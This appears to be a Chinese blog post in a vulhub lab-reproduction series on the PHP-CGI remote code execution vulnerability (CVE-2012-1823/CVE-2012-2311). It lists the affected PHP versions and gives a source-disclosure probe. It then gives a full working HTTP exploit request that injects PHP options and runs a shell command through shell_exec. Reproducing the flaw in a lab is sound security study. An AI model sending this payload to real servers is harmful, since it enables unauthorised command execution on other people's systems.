PHP-CGI远程代码执行漏洞（CVE-2012-1823&&CVE-2012-2311）

小白萝卜

于 2021-07-18 17:06:19 发布

阅读量634

点赞数

分类专栏： vulhub漏洞复现文章标签：安全

本文链接：https://blog.csdn.net/EC_Carrot/article/details/118879428

版权

vulhub漏洞复现专栏收录该内容

178 篇文章

订阅专栏

本文详细介绍了一起影响PHP版本低于5.3.12和5.4.2的CVE-2012-1823漏洞，展示了复现方法和利用payload，并探讨了修复措施和安全建议。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

漏洞详细

详细务必请看：https://vulhub.org/#/environments/php/CVE-2012-1823/

影响版本

php < 5.3.12 or php < 5.4.2

漏洞复现

访问http://your-ip:8080/index.php?-s即爆出源码，说明漏洞存在，我们可以发送以下数据包来执行任意命令：

POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: your_ip
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31

<?php echo shell_exec("id"); ?>